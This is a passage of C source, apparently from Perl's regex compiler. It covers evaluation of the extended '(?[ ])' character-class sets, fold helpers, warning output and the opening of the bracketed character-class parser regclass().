/* Here, the new operator has higher precedence than the
* stacked one. This means we need to add the new one to
* the stack to await its rhs operand (and maybe more
* stuff). We put it before the lhs operand, leaving
* untouched the stacked operator and everything below it
* */
lhs = av_pop(stack);
assert(IS_OPERAND(lhs));
av_push(stack, newSVuv(curchar));
av_push(stack, lhs);
break;
}
/* Here, the new operator has equal or lower precedence than
* what's already there. This means the operation already
* there should be performed now, before the new one. */
rhs = av_pop(stack);
if (! IS_OPERAND(rhs)) {
/* This can happen when a ! is not followed by an operand,
* like in /(?[\t &!])/ */
goto bad_syntax;
}
lhs = av_pop(stack);
if (! IS_OPERAND(lhs)) {
/* This can happen when there is an empty (), like in
* /(?[[0]+()+])/ */
goto bad_syntax;
}
switch (stacked_operator) {
case '&':
_invlist_intersection(lhs, rhs, &rhs);
break;
case '|':
case '+':
_invlist_union(lhs, rhs, &rhs);
break;
case '-':
_invlist_subtract(lhs, rhs, &rhs);
break;
case '^': /* The union minus the intersection */
{
SV* i = NULL;
SV* u = NULL;
_invlist_union(lhs, rhs, &u);
_invlist_intersection(lhs, rhs, &i);
_invlist_subtract(u, i, &rhs);
SvREFCNT_dec_NN(i);
SvREFCNT_dec_NN(u);
break;
}
}
SvREFCNT_dec(lhs);
/* Here, the higher precedence operation has been done, and the
* result is in 'rhs'. We overwrite the stacked operator with
* the result. Then we redo this code to either push the new
* operator onto the stack or perform any higher precedence
* stacked operation */
only_to_avoid_leaks = av_pop(stack);
SvREFCNT_dec(only_to_avoid_leaks);
av_push(stack, rhs);
goto redo_curchar;
case '!': /* Highest priority, right associative */
            /* If what's already at the top of the stack is another '!',
* they just cancel each other out */
if ( (top_ptr = av_fetch(stack, top_index, FALSE))
&& (IS_OPERATOR(*top_ptr) && SvUV(*top_ptr) == '!'))
{
only_to_avoid_leaks = av_pop(stack);
SvREFCNT_dec(only_to_avoid_leaks);
}
else { /* Otherwise, since it's right associative, just push
onto the stack */
av_push(stack, newSVuv(curchar));
}
break;
default:
RExC_parse += (UTF) ? UTF8SKIP(RExC_parse) : 1;
if (RExC_parse >= RExC_end) {
break;
}
vFAIL("Unexpected character");
handle_operand:
/* Here 'current' is the operand. If something is already on the
* stack, we have to check if it is a !. But first, the code above
* may have altered the stack in the time since we earlier set
* 'top_index'. */
top_index = av_tindex_skip_len_mg(stack);
if (top_index - fence >= 0) {
/* If the top entry on the stack is an operator, it had better
* be a '!', otherwise the entry below the top operand should
* be an operator */
top_ptr = av_fetch(stack, top_index, FALSE);
assert(top_ptr);
if (IS_OPERATOR(*top_ptr)) {
/* The only permissible operator at the top of the stack is
* '!', which is applied immediately to this operand. */
curchar = (char) SvUV(*top_ptr);
if (curchar != '!') {
SvREFCNT_dec(current);
vFAIL2("Unexpected binary operator '%c' with no "
"preceding operand", curchar);
}
_invlist_invert(current);
only_to_avoid_leaks = av_pop(stack);
SvREFCNT_dec(only_to_avoid_leaks);
/* And we redo with the inverted operand. This allows
* handling multiple ! in a row */
goto handle_operand;
}
/* Single operand is ok only for the non-binary ')'
* operator */
else if ((top_index - fence == 0 && curchar != ')')
|| (top_index - fence > 0
&& (! (stacked_ptr = av_fetch(stack,
top_index - 1,
FALSE))
|| IS_OPERAND(*stacked_ptr))))
{
SvREFCNT_dec(current);
vFAIL("Operand with no preceding operator");
}
}
/* Here there was nothing on the stack or the top element was
* another operand. Just add this new one */
av_push(stack, current);
} /* End of switch on next parse token */
RExC_parse += (UTF) ? UTF8SKIP(RExC_parse) : 1;
} /* End of loop parsing through the construct */
vFAIL("Syntax error in (?[...])");
done:
if (RExC_parse >= RExC_end || RExC_parse[1] != ')') {
if (RExC_parse < RExC_end) {
RExC_parse++;
}
vFAIL("Unexpected ']' with no following ')' in (?[...");
}
if (av_tindex_skip_len_mg(fence_stack) >= 0) {
vFAIL("Unmatched (");
}
if (av_tindex_skip_len_mg(stack) < 0 /* Was empty */
|| ((final = av_pop(stack)) == NULL)
|| ! IS_OPERAND(final)
|| ! is_invlist(final)
|| av_tindex_skip_len_mg(stack) >= 0) /* More left on stack */
{
bad_syntax:
SvREFCNT_dec(final);
vFAIL("Incomplete expression within '(?[ ])'");
}
/* Here, 'final' is the resultant inversion list from evaluating the
* expression. Return it if so requested */
if (return_invlist) {
*return_invlist = final;
return END;
}
/* Otherwise generate a resultant node, based on 'final'. regclass() is
* expecting a string of ranges and individual code points */
invlist_iterinit(final);
result_string = newSVpvs("");
while (invlist_iternext(final, &start, &end)) {
if (start == end) {
Perl_sv_catpvf(aTHX_ result_string, "\\x{%" UVXf "}", start);
}
else {
Perl_sv_catpvf(aTHX_ result_string, "\\x{%" UVXf "}-\\x{%" UVXf "}",
start, end);
}
}
/* About to generate an ANYOF (or similar) node from the inversion list we
* have calculated */
save_parse = RExC_parse;
RExC_parse = SvPV(result_string, len);
save_end = RExC_end;
RExC_end = RExC_parse + len;
TURN_OFF_WARNINGS_IN_SUBSTITUTE_PARSE;
/* We turn off folding around the call, as the class we have constructed
* already has all folding taken into consideration, and we don't want
* regclass() to add to that */
RExC_flags &= ~RXf_PMf_FOLD;
/* regclass() can only return RESTART_PARSE and NEED_UTF8 if multi-char
* folds are allowed. */
node = regclass(pRExC_state, flagp, depth+1,
FALSE, /* means parse the whole char class */
FALSE, /* don't allow multi-char folds */
TRUE, /* silence non-portable warnings. The above may very
well have generated non-portable code points, but
they're valid on this machine */
FALSE, /* similarly, no need for strict */
FALSE, /* Require return to be an ANYOF */
NULL
);
RESTORE_WARNINGS;
RExC_parse = save_parse + 1;
RExC_end = save_end;
SvREFCNT_dec_NN(final);
SvREFCNT_dec_NN(result_string);
if (save_fold) {
RExC_flags |= RXf_PMf_FOLD;
}
if (!node) {
RETURN_FAIL_ON_RESTART(*flagp, flagp);
goto regclass_failed;
}
/* Fix up the node type if we are in locale. (We have pretended we are
* under /u for the purposes of regclass(), as this construct will only
* work under UTF-8 locales. But now we change the opcode to be ANYOFL (so
* as to cause any warnings about bad locales to be output in regexec.c),
* and add the flag that indicates to check if not in a UTF-8 locale. The
* reason we above forbid optimization into something other than an ANYOF
* node is simply to minimize the number of code changes in regexec.c.
* Otherwise we would have to create new EXACTish node types and deal with
* them. This decision could be revisited should this construct become
* popular.
*
* (One might think we could look at the resulting ANYOF node and suppress
* the flag if everything is above 255, as those would be UTF-8 only,
* but this isn't true, as the components that led to that result could
* have been locale-affected, and just happen to cancel each other out
* under UTF-8 locales.) */
if (in_locale) {
set_regex_charset(&RExC_flags, REGEX_LOCALE_CHARSET);
assert(OP(REGNODE_p(node)) == ANYOF);
OP(REGNODE_p(node)) = ANYOFL;
ANYOF_FLAGS(REGNODE_p(node))
|= ANYOFL_SHARED_UTF8_LOCALE_fold_HAS_MATCHES_nonfold_REQD;
}
nextchar(pRExC_state);
Set_Node_Length(REGNODE_p(node), RExC_parse - oregcomp_parse + 1); /* MJD */
return node;
regclass_failed:
FAIL2("panic: regclass returned failure to handle_sets, " "flags=%#" UVxf,
(UV) *flagp);
}
#ifdef ENABLE_REGEX_SETS_DEBUGGING
STATIC void
S_dump_regex_sets_structures(pTHX_ RExC_state_t *pRExC_state,
AV * stack, const IV fence, AV * fence_stack)
{ /* Dumps the stacks in handle_regex_sets() */
const SSize_t stack_top = av_tindex_skip_len_mg(stack);
const SSize_t fence_stack_top = av_tindex_skip_len_mg(fence_stack);
SSize_t i;
PERL_ARGS_ASSERT_DUMP_REGEX_SETS_STRUCTURES;
PerlIO_printf(Perl_debug_log, "\nParse position is:%s\n", RExC_parse);
if (stack_top < 0) {
PerlIO_printf(Perl_debug_log, "Nothing on stack\n");
}
else {
PerlIO_printf(Perl_debug_log, "Stack: (fence=%d)\n", (int) fence);
for (i = stack_top; i >= 0; i--) {
SV ** element_ptr = av_fetch(stack, i, FALSE);
            if (! element_ptr) {
                continue;   /* Skip a missing element rather than
                               dereferencing a NULL pointer below */
            }
if (IS_OPERATOR(*element_ptr)) {
PerlIO_printf(Perl_debug_log, "[%d]: %c\n",
(int) i, (int) SvIV(*element_ptr));
}
else {
PerlIO_printf(Perl_debug_log, "[%d] ", (int) i);
sv_dump(*element_ptr);
}
}
}
if (fence_stack_top < 0) {
PerlIO_printf(Perl_debug_log, "Nothing on fence_stack\n");
}
else {
PerlIO_printf(Perl_debug_log, "Fence_stack: \n");
for (i = fence_stack_top; i >= 0; i--) {
SV ** element_ptr = av_fetch(fence_stack, i, FALSE);
            if (! element_ptr) {
                continue;   /* Skip a missing element rather than
                               dereferencing a NULL pointer below */
            }
PerlIO_printf(Perl_debug_log, "[%d]: %d\n",
(int) i, (int) SvIV(*element_ptr));
}
}
}
#endif
#undef IS_OPERATOR
#undef IS_OPERAND
STATIC void
S_add_above_Latin1_folds(pTHX_ RExC_state_t *pRExC_state, const U8 cp, SV** invlist)
{
/* This adds the Latin1/above-Latin1 folding rules.
*
* This should be called only for a Latin1-range code points, cp, which is
* known to be involved in a simple fold with other code points above
* Latin1. It would give false results if /aa has been specified.
* Multi-char folds are outside the scope of this, and must be handled
* specially. */
PERL_ARGS_ASSERT_ADD_ABOVE_LATIN1_FOLDS;
assert(HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(cp));
/* The rules that are valid for all Unicode versions are hard-coded in */
switch (cp) {
case 'k':
case 'K':
*invlist =
add_cp_to_invlist(*invlist, KELVIN_SIGN);
break;
case 's':
case 'S':
*invlist = add_cp_to_invlist(*invlist, LATIN_SMALL_LETTER_LONG_S);
break;
case MICRO_SIGN:
*invlist = add_cp_to_invlist(*invlist, GREEK_CAPITAL_LETTER_MU);
*invlist = add_cp_to_invlist(*invlist, GREEK_SMALL_LETTER_MU);
break;
case LATIN_CAPITAL_LETTER_A_WITH_RING_ABOVE:
case LATIN_SMALL_LETTER_A_WITH_RING_ABOVE:
*invlist = add_cp_to_invlist(*invlist, ANGSTROM_SIGN);
break;
case LATIN_SMALL_LETTER_Y_WITH_DIAERESIS:
*invlist = add_cp_to_invlist(*invlist,
LATIN_CAPITAL_LETTER_Y_WITH_DIAERESIS);
break;
default: /* Other code points are checked against the data for the
current Unicode version */
{
Size_t folds_count;
unsigned int first_fold;
const unsigned int * remaining_folds;
UV folded_cp;
if (isASCII(cp)) {
folded_cp = toFOLD(cp);
}
else {
U8 dummy_fold[UTF8_MAXBYTES_CASE+1];
Size_t dummy_len;
folded_cp = _to_fold_latin1(cp, dummy_fold, &dummy_len, 0);
}
if (folded_cp > 255) {
*invlist = add_cp_to_invlist(*invlist, folded_cp);
}
folds_count = _inverse_folds(folded_cp, &first_fold,
&remaining_folds);
if (folds_count == 0) {
/* Use deprecated warning to increase the chances of this being
* output */
ckWARN2reg_d(RExC_parse,
"Perl folding rules are not up-to-date for 0x%02X;"
" please use the perlbug utility to report;", cp);
}
else {
unsigned int i;
if (first_fold > 255) {
*invlist = add_cp_to_invlist(*invlist, first_fold);
}
for (i = 0; i < folds_count - 1; i++) {
if (remaining_folds[i] > 255) {
*invlist = add_cp_to_invlist(*invlist,
remaining_folds[i]);
}
}
}
break;
}
}
}
STATIC void
S_output_posix_warnings(pTHX_ RExC_state_t *pRExC_state, AV* posix_warnings)
{
/* Output the elements of the array given by '*posix_warnings' as REGEXP
* warnings. */
SV * msg;
const bool first_is_fatal = ckDEAD(packWARN(WARN_REGEXP));
PERL_ARGS_ASSERT_OUTPUT_POSIX_WARNINGS;
if (! TO_OUTPUT_WARNINGS(RExC_parse)) {
return;
}
while ((msg = av_shift(posix_warnings)) != &PL_sv_undef) {
if (first_is_fatal) { /* Avoid leaking this */
av_undef(posix_warnings); /* This isn't necessary if the
array is mortal, but is a
fail-safe */
(void) sv_2mortal(msg);
PREPARE_TO_DIE;
}
Perl_warner(aTHX_ packWARN(WARN_REGEXP), "%s", SvPVX(msg));
SvREFCNT_dec_NN(msg);
}
UPDATE_WARNINGS_LOC(RExC_parse);
}
STATIC AV *
S_add_multi_match(pTHX_ AV* multi_char_matches, SV* multi_string, const STRLEN cp_count)
{
/* This adds the string scalar <multi_string> to the array
* <multi_char_matches>. <multi_string> is known to have exactly
* <cp_count> code points in it. This is used when constructing a
* bracketed character class and we find something that needs to match more
* than a single character.
*
* <multi_char_matches> is actually an array of arrays. Each top-level
* element is an array that contains all the strings known so far that are
* the same length. And that length (in number of code points) is the same
* as the index of the top-level array. Hence, the [2] element is an
* array, each element thereof is a string containing TWO code points;
* while element [3] is for strings of THREE characters, and so on. Since
* this is for multi-char strings there can never be a [0] nor [1] element.
*
* When we rewrite the character class below, we will do so such that the
* longest strings are written first, so that it prefers the longest
* matching strings first. This is done even if it turns out that any
* quantifier is non-greedy, out of this programmer's (khw) laziness. Tom
* Christiansen has agreed that this is ok. This makes the test for the
* ligature 'ffi' come before the test for 'ff', for example */
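    /* A schematic picture of the layout (hypothetical contents, purely for
     * illustration): after adding "ff" (2 code points) and "ffi" (3 code
     * points), the structure would look like
     *
     *      multi_char_matches[2] -> [ "ff"  ]
     *      multi_char_matches[3] -> [ "ffi" ]
     *
     * with indices [0] and [1] never used */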
AV* this_array;
AV** this_array_ptr;
PERL_ARGS_ASSERT_ADD_MULTI_MATCH;
if (! multi_char_matches) {
multi_char_matches = newAV();
}
if (av_exists(multi_char_matches, cp_count)) {
this_array_ptr = (AV**) av_fetch(multi_char_matches, cp_count, FALSE);
this_array = *this_array_ptr;
}
else {
this_array = newAV();
av_store(multi_char_matches, cp_count,
(SV*) this_array);
}
av_push(this_array, multi_string);
return multi_char_matches;
}
/* The names of properties whose definitions are not known at compile time are
* stored in this SV, after a constant heading. So if the length has been
* changed since initialization, then there is a run-time definition. */
#define HAS_NONLOCALE_RUNTIME_PROPERTY_DEFINITION \
(SvCUR(listsv) != initial_listsv_len)
/* There is a restricted set of white space characters that are legal when
* ignoring white space in a bracketed character class. This generates the
* code to skip them.
*
* There is a line below that uses the same white space criteria but is outside
* this macro. Both here and there must use the same definition */
#define SKIP_BRACKETED_WHITE_SPACE(do_skip, p) \
STMT_START { \
if (do_skip) { \
while (isBLANK_A(UCHARAT(p))) \
{ \
p++; \
} \
} \
} STMT_END
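/* For instance (a descriptive note only), the first use below,
 * SKIP_BRACKETED_WHITE_SPACE(skip_white, RExC_parse), advances RExC_parse
 * past any ASCII blanks when 'skip_white' is true, and is a complete no-op
 * otherwise */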
STATIC regnode_offset
S_regclass(pTHX_ RExC_state_t *pRExC_state, I32 *flagp, U32 depth,
const bool stop_at_1, /* Just parse the next thing, don't
look for a full character class */
bool allow_mutiple_chars,
const bool silence_non_portable, /* Don't output warnings
about too large
characters */
const bool strict,
bool optimizable, /* ? Allow a non-ANYOF return
node */
SV** ret_invlist /* Return an inversion list, not a node */
)
{
/* parse a bracketed class specification. Most of these will produce an
* ANYOF node; but something like [a] will produce an EXACT node; [aA], an
* EXACTFish node; [[:ascii:]], a POSIXA node; etc. It is more complex
* under /i with multi-character folds: it will be rewritten following the
* paradigm of this example, where the <multi-fold>s are characters which
* fold to multiple character sequences:
* /[abc\x{multi-fold1}def\x{multi-fold2}ghi]/i
* gets effectively rewritten as:
     *      /(?:\x{multi-fold1}|\x{multi-fold2}|[abcdefghi])/i
* reg() gets called (recursively) on the rewritten version, and this
* function will return what it constructs. (Actually the <multi-fold>s
* aren't physically removed from the [abcdefghi], it's just that they are
* ignored in the recursion by means of a flag:
* <RExC_in_multi_char_class>.)
*
* ANYOF nodes contain a bit map for the first NUM_ANYOF_CODE_POINTS
* characters, with the corresponding bit set if that character is in the
* list. For characters above this, an inversion list is used. There
* are extra bits for \w, etc. in locale ANYOFs, as what these match is not
* determinable at compile time
*
* On success, returns the offset at which any next node should be placed
* into the regex engine program being compiled.
*
* Returns 0 otherwise, setting flagp to RESTART_PARSE if the parse needs
* to be restarted, or'd with NEED_UTF8 if the pattern needs to be upgraded to
* UTF-8
*/
dVAR;
UV prevvalue = OOB_UNICODE, save_prevvalue = OOB_UNICODE;
IV range = 0;
UV value = OOB_UNICODE, save_value = OOB_UNICODE;
regnode_offset ret = -1; /* Initialized to an illegal value */
STRLEN numlen;
int namedclass = OOB_NAMEDCLASS;
char *rangebegin = NULL;
SV *listsv = NULL; /* List of \p{user-defined} whose definitions
aren't available at the time this was called */
STRLEN initial_listsv_len = 0; /* Kind of a kludge to see if it is more
than just initialized. */
SV* properties = NULL; /* Code points that match \p{} \P{} */
SV* posixes = NULL; /* Code points that match classes like [:word:],
extended beyond the Latin1 range. These have to
be kept separate from other code points for much
of this function because their handling is
different under /i, and for most classes under
/d as well */
SV* nposixes = NULL; /* Similarly for [:^word:]. These are kept
separate for a while from the non-complemented
versions because of complications with /d
matching */
SV* simple_posixes = NULL; /* But under some conditions, the classes can be
treated more simply than the general case,
leading to less compilation and execution
work */
UV element_count = 0; /* Number of distinct elements in the class.
Optimizations may be possible if this is tiny */
AV * multi_char_matches = NULL; /* Code points that fold to more than one
character; used under /i */
UV n;
char * stop_ptr = RExC_end; /* where to stop parsing */
/* ignore unescaped whitespace? */
const bool skip_white = cBOOL( ret_invlist
|| (RExC_flags & RXf_PMf_EXTENDED_MORE));
/* inversion list of code points this node matches only when the target
     * string is in UTF-8. These are all non-ASCII, < 256. (Because it is under
* /d) */
SV* upper_latin1_only_utf8_matches = NULL;
/* Inversion list of code points this node matches regardless of things
* like locale, folding, utf8ness of the target string */
SV* cp_list = NULL;
/* Like cp_list, but code points on this list need to be checked for things
* that fold to/from them under /i */
SV* cp_foldable_list = NULL;
/* Like cp_list, but code points on this list are valid only when the
* runtime locale is UTF-8 */
SV* only_utf8_locale_list = NULL;
/* In a range, if one of the endpoints is non-character-set portable,
* meaning that it hard-codes a code point that may mean a different
     * character in ASCII vs. EBCDIC, as opposed to, say, a literal 'A' or a
* mnemonic '\t' which each mean the same character no matter which
* character set the platform is on. */
unsigned int non_portable_endpoint = 0;
/* Is the range unicode? which means on a platform that isn't 1-1 native
* to Unicode (i.e. non-ASCII), each code point in it should be considered
* to be a Unicode value. */
bool unicode_range = FALSE;
bool invert = FALSE; /* Is this class to be complemented */
bool warn_super = ALWAYS_WARN_SUPER;
const char * orig_parse = RExC_parse;
/* This variable is used to mark where the end in the input is of something
* that looks like a POSIX construct but isn't. During the parse, when
* something looks like it could be such a construct is encountered, it is
* checked for being one, but not if we've already checked this area of the
* input. Only after this position is reached do we check again */
char *not_posix_region_end = RExC_parse - 1;
AV* posix_warnings = NULL;
const bool do_posix_warnings = ckWARN(WARN_REGEXP);
U8 op = END; /* The returned node-type, initialized to an impossible
one. */
U8 anyof_flags = 0; /* flag bits if the node is an ANYOF-type */
U32 posixl = 0; /* bit field of posix classes matched under /l */
/* Flags as to what things aren't knowable until runtime. (Note that these are
* mutually exclusive.) */
#define HAS_USER_DEFINED_PROPERTY 0x01 /* /u any user-defined properties that
haven't been defined as of yet */
#define HAS_D_RUNTIME_DEPENDENCY 0x02 /* /d if the target being matched is
UTF-8 or not */
#define HAS_L_RUNTIME_DEPENDENCY 0x04 /* /l what the posix classes match and
what gets folded */
U32 has_runtime_dependency = 0; /* OR of the above flags */
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGCLASS;
#ifndef DEBUGGING
PERL_UNUSED_ARG(depth);
#endif
    /* If the caller wants an inversion list returned, we can't optimize to something
* else. */
if (ret_invlist) {
optimizable = FALSE;
}
DEBUG_PARSE("clas");
#if UNICODE_MAJOR_VERSION < 3 /* no multifolds in early Unicode */ \
|| (UNICODE_MAJOR_VERSION == 3 && UNICODE_DOT_VERSION == 0 \
&& UNICODE_DOT_DOT_VERSION == 0)
allow_mutiple_chars = FALSE;
#endif
/* We include the /i status at the beginning of this so that we can
* know it at runtime */
listsv = sv_2mortal(Perl_newSVpvf(aTHX_ "#%d\n", cBOOL(FOLD)));
initial_listsv_len = SvCUR(listsv);
SvTEMP_off(listsv); /* Grr, TEMPs and mortals are conflated. */
SKIP_BRACKETED_WHITE_SPACE(skip_white, RExC_parse);
assert(RExC_parse <= RExC_end);
if (UCHARAT(RExC_parse) == '^') { /* Complement the class */
RExC_parse++;
invert = TRUE;
allow_mutiple_chars = FALSE;
MARK_NAUGHTY(1);
SKIP_BRACKETED_WHITE_SPACE(skip_white, RExC_parse);
}
/* Check that they didn't say [:posix:] instead of [[:posix:]] */
if (! ret_invlist && MAYBE_POSIXCC(UCHARAT(RExC_parse))) {
int maybe_class = handle_possible_posix(pRExC_state,
RExC_parse,
                                            &not_posix_region_end,
NULL,
TRUE /* checking only */);
if (maybe_class >= OOB_NAMEDCLASS && do_posix_warnings) {
ckWARN4reg(not_posix_region_end,
"POSIX syntax [%c %c] belongs inside character classes%s",
*RExC_parse, *RExC_parse,
(maybe_class == OOB_NAMEDCLASS)
? ((POSIXCC_NOTYET(*RExC_parse))
? " (but this one isn't implemented)"
: " (but this one isn't fully valid)")
: ""
);
}
}
/* If the caller wants us to just parse a single element, accomplish this
* by faking the loop ending condition */
if (stop_at_1 && RExC_end > RExC_parse) {
stop_ptr = RExC_parse + 1;
}
/* allow 1st char to be ']' (allowing it to be '-' is dealt with later) */
if (UCHARAT(RExC_parse) == ']')
goto charclassloop;
while (1) {
if ( posix_warnings
&& av_tindex_skip_len_mg(posix_warnings) >= 0
&& RExC_parse > not_posix_region_end)
{
/* Warnings about posix class issues are considered tentative until
* we are far enough along in the parse that we can no longer
* change our mind, at which point we output them. This is done
* each time through the loop so that a later class won't zap them
* before they have been dealt with. */
output_posix_warnings(pRExC_state, posix_warnings);
}
if (RExC_parse >= stop_ptr) {
break;
}
SKIP_BRACKETED_WHITE_SPACE(skip_white, RExC_parse);
if (UCHARAT(RExC_parse) == ']') {
break;
}
charclassloop:
namedclass = OOB_NAMEDCLASS; /* initialize as illegal */
save_value = value;
save_prevvalue = prevvalue;
if (!range) {
rangebegin = RExC_parse;
element_count++;
non_portable_endpoint = 0;
}
if (UTF && ! UTF8_IS_INVARIANT(* RExC_parse)) {
value = utf8n_to_uvchr((U8*)RExC_parse,
RExC_end - RExC_parse,
&numlen, UTF8_ALLOW_DEFAULT);
RExC_parse += numlen;
}
else
value = UCHARAT(RExC_parse++);
if (value == '[') {
char * posix_class_end;
namedclass = handle_possible_posix(pRExC_state,
RExC_parse,
&posix_class_end,
do_posix_warnings ? &posix_warnings : NULL,
FALSE /* die if error */);
if (namedclass > OOB_NAMEDCLASS) {
/* If there was an earlier attempt to parse this particular
* posix class, and it failed, it was a false alarm, as this
* successful one proves */
if ( posix_warnings
&& av_tindex_skip_len_mg(posix_warnings) >= 0
&& not_posix_region_end >= RExC_parse
&& not_posix_region_end <= posix_class_end)
{
av_undef(posix_warnings);
}
RExC_parse = posix_class_end;
}
else if (namedclass == OOB_NAMEDCLASS) {
not_posix_region_end = posix_class_end;
}
else {
namedclass = OOB_NAMEDCLASS;
}
}
else if ( RExC_parse - 1 > not_posix_region_end
&& MAYBE_POSIXCC(value))
{
(void) handle_possible_posix(
pRExC_state,
RExC_parse - 1, /* -1 because parse has already been
advanced */
                &not_posix_region_end,
do_posix_warnings ? &posix_warnings : NULL,
TRUE /* checking only */);
}
else if ( strict && ! skip_white
&& ( _generic_isCC(value, _CC_VERTSPACE)
|| is_VERTWS_cp_high(value)))
{
vFAIL("Literal vertical space in [] is illegal except under /x");
}
else if (value == '\\') {
/* Is a backslash; get the code point of the char after it */
if (RExC_parse >= RExC_end) {
vFAIL("Unmatched [");
}
if (UTF && ! UTF8_IS_INVARIANT(UCHARAT(RExC_parse))) {
value = utf8n_to_uvchr((U8*)RExC_parse,
RExC_end - RExC_parse,
&numlen, UTF8_ALLOW_DEFAULT);
RExC_parse += numlen;
}
else
value = UCHARAT(RExC_parse++);
/* Some compilers cannot handle switching on 64-bit integer
* values, therefore value cannot be an UV. Yes, this will
* be a problem later if we want switch on Unicode.
* A similar issue a little bit later when switching on
* namedclass. --jhi */
/* If the \ is escaping white space when white space is being
* skipped, it means that that white space is wanted literally, and
* is already in 'value'. Otherwise, need to translate the escape
* into what it signifies. */
if (! skip_white || ! isBLANK_A(value)) switch ((I32)value) {
case 'w': namedclass = ANYOF_WORDCHAR; break;
case 'W': namedclass = ANYOF_NWORDCHAR; break;
case 's': namedclass = ANYOF_SPACE; break;
case 'S': namedclass = ANYOF_NSPACE; break;
case 'd': namedclass = ANYOF_DIGIT; break;
case 'D': namedclass = ANYOF_NDIGIT; break;
case 'v': namedclass = ANYOF_VERTWS; break;
case 'V': namedclass = ANYOF_NVERTWS; break;
case 'h': namedclass = ANYOF_HORIZWS; break;
case 'H': namedclass = ANYOF_NHORIZWS; break;
case 'N': /* Handle \N{NAME} in class */
{
const char * const backslash_N_beg = RExC_parse - 2;
int cp_count;
if (! grok_bslash_N(pRExC_state,
NULL, /* No regnode */
&value, /* Yes single value */
&cp_count, /* Multiple code pt count */
flagp,
strict,
depth)
) {
if (*flagp & NEED_UTF8)
FAIL("panic: grok_bslash_N set NEED_UTF8");
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
if (cp_count < 0) {
vFAIL("\\N in a character class must be a named character: \\N{...}");
}
else if (cp_count == 0) {
ckWARNreg(RExC_parse,
"Ignoring zero length \\N{} in character class");
}
else { /* cp_count > 1 */
assert(cp_count > 1);
if (! RExC_in_multi_char_class) {
if ( ! allow_mutiple_chars
|| invert
|| range
|| *RExC_parse == '-')
{
if (strict) {
RExC_parse--;
vFAIL("\\N{} in inverted character class or as a range end-point is restricted to one character");
}
ckWARNreg(RExC_parse, "Using just the first character returned by \\N{} in character class");
break; /* <value> contains the first code
point. Drop out of the switch to
process it */
}
else {
SV * multi_char_N = newSVpvn(backslash_N_beg,
RExC_parse - backslash_N_beg);
multi_char_matches
= add_multi_match(multi_char_matches,
multi_char_N,
cp_count);
}
}
} /* End of cp_count != 1 */
/* This element should not be processed further in this
* class */
element_count--;
value = save_value;
prevvalue = save_prevvalue;
continue; /* Back to top of loop to get next char */
}
/* Here, is a single code point, and <value> contains it */
unicode_range = TRUE; /* \N{} are Unicode */
}
break;
case 'p':
case 'P':
{
char *e;
/* \p means they want Unicode semantics */
REQUIRE_UNI_RULES(flagp, 0);
if (RExC_parse >= RExC_end)
vFAIL2("Empty \\%c", (U8)value);
if (*RExC_parse == '{') {
const U8 c = (U8)value;
e = (char *) memchr(RExC_parse, '}', RExC_end - RExC_parse);
if (!e) {
RExC_parse++;
vFAIL2("Missing right brace on \\%c{}", c);
}
RExC_parse++;
/* White space is allowed adjacent to the braces and after
* any '^', even when not under /x */
while (isSPACE(*RExC_parse)) {
RExC_parse++;
}
if (UCHARAT(RExC_parse) == '^') {
/* toggle. (The rhs xor gets the single bit that
* differs between P and p; the other xor inverts just
* that bit) */
value ^= 'P' ^ 'p';
RExC_parse++;
while (isSPACE(*RExC_parse)) {
RExC_parse++;
}
}
if (e == RExC_parse)
vFAIL2("Empty \\%c{}", c);
n = e - RExC_parse;
while (isSPACE(*(RExC_parse + n - 1)))
n--;
} /* The \p isn't immediately followed by a '{' */
else if (! isALPHA(*RExC_parse)) {
RExC_parse += (UTF)
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
vFAIL2("Character following \\%c must be '{' or a "
"single-character Unicode property name",
(U8) value);
}
else {
e = RExC_parse;
n = 1;
}
{
char* name = RExC_parse;
/* Any message returned about expanding the definition */
SV* msg = newSVpvs_flags("", SVs_TEMP);
/* If set TRUE, the property is user-defined as opposed to
* official Unicode */
bool user_defined = FALSE;
SV * prop_definition = parse_uniprop_string(
name, n, UTF, FOLD,
FALSE, /* This is compile-time */
/* We can't defer this defn when
* the full result is required in
* this call */
! cBOOL(ret_invlist),
&user_defined,
msg,
0 /* Base level */
);
if (SvCUR(msg)) { /* Assumes any error causes a msg */
assert(prop_definition == NULL);
RExC_parse = e + 1;
if (SvUTF8(msg)) { /* msg being UTF-8 makes the whole
thing so, or else the display is
mojibake */
RExC_utf8 = TRUE;
}
/* diag_listed_as: Can't find Unicode property definition "%s" in regex; marked by <-- HERE in m/%s/ */
vFAIL2utf8f("%" UTF8f, UTF8fARG(SvUTF8(msg),
SvCUR(msg), SvPVX(msg)));
}
if (! is_invlist(prop_definition)) {
/* Here, the definition isn't known, so we have gotten
* returned a string that will be evaluated if and when
* encountered at runtime. We add it to the list of
* such properties, along with whether it should be
* complemented or not */
if (value == 'P') {
sv_catpvs(listsv, "!");
}
else {
sv_catpvs(listsv, "+");
}
sv_catsv(listsv, prop_definition);
has_runtime_dependency |= HAS_USER_DEFINED_PROPERTY;
/* We don't know yet what this matches, so have to flag
* it */
anyof_flags |= ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP;
}
else {
assert (prop_definition && is_invlist(prop_definition));
/* Here we do have the complete property definition
*
* Temporary workaround for [perl #133136]. For this
* precise input that is in the .t that is failing,
* load utf8.pm, which is what the test wants, so that
* that .t passes */
if ( memEQs(RExC_start, e + 1 - RExC_start,
"foo\\p{Alnum}")
&& ! hv_common(GvHVn(PL_incgv),
NULL,
"utf8.pm", sizeof("utf8.pm") - 1,
0, HV_FETCH_ISEXISTS, NULL, 0))
{
require_pv("utf8.pm");
}
if (! user_defined &&
/* We warn on matching an above-Unicode code point
* if the match would return true, except don't
* warn for \p{All}, which has exactly one element
* = 0 */
(_invlist_contains_cp(prop_definition, 0x110000)
&& (! (_invlist_len(prop_definition) == 1
&& *invlist_array(prop_definition) == 0))))
{
warn_super = TRUE;
}
/* Invert if asking for the complement */
if (value == 'P') {
_invlist_union_complement_2nd(properties,
prop_definition,
&properties);
}
else {
_invlist_union(properties, prop_definition, &properties);
}
}
}
RExC_parse = e + 1;
namedclass = ANYOF_UNIPROP; /* no official name, but it's
named */
}
break;
case 'n': value = '\n'; break;
case 'r': value = '\r'; break;
case 't': value = '\t'; break;
case 'f': value = '\f'; break;
case 'b': value = '\b'; break;
